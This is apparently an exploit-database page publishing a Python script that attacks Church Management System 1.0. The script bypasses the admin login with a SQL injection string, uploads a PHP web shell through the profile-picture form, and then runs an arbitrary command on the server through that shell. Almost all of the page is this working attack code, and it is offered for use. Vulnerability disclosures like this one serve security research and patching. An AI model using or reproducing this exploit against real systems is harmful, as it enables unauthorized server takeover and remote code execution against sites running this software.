Church Management System 1.0 Shell Upload / SQL Injection

2021.07.09
Risk: High
Local: No
Remote: Yes
CVE: N/A

# Exploit Title: Church Management System 1.0 - SQL Injection (Authentication Bypass) + Arbitrary File Upload + RCE # Date: 05-07-2021 # Exploit Author: Eleonora Guardini (eleguardini93 at gmail dot com or eleonora.guardini at dedagroup dot com) # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/11206/church-management-system.html # Version: 1.0 # Tested On: Ubuntu 18.04 with apache2 2.4.29 (Ubuntu) import requests from requests_toolbelt.multipart.encoder import MultipartEncoder import random import os, sys import argparse import optparse import string if len(sys.argv)!=5: print('Usage: -u http://<ip> -c <"command">') print('ex. python3 http://192.168.1.2 -c "ls+-la"') exit() parser = optparse.OptionParser() parser.add_option('-u', '--url', action="store", dest="url") parser.add_option('-c', '--cmd', action="store", dest="cmd") options,args=parser.parse_args() print(options.url, options.cmd) print(len(sys.argv)) def randomGen(size=8, chars=string.ascii_lowercase): return ''.join(random.choice(chars) for _ in range(size)) urlbase=options.url+'/cman/admin'; loginUrl=urlbase+'/index.php'; shellFile=randomGen()+".php" payload={"username":"test", "password":"' or 'a'='a'#", "login":""}; proxies = { "http": "http://localhost:8080"} mp_encoder = MultipartEncoder(fields = { "image":(shellFile,"<?php if(isset($_REQUEST['cmd'])){$cmd = ($_REQUEST['cmd']); system($cmd);die; }?>","application/x-php"), "change":""}) session=requests.Session() r=session.post(loginUrl, payload, allow_redirects=False) #, proxies=proxies) cookie=r.headers["Set-Cookie"] headers = {"Cookie": cookie, 'Content-Type':mp_encoder.content_type} uploadUrl=urlbase+"/admin_pic.php" post=session.post(uploadUrl, data=mp_encoder, allow_redirects=False, headers=headers, proxies=proxies) os.system("curl " + urlbase + "/uploads/" + shellFile + "?cmd="+ options.cmd)


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top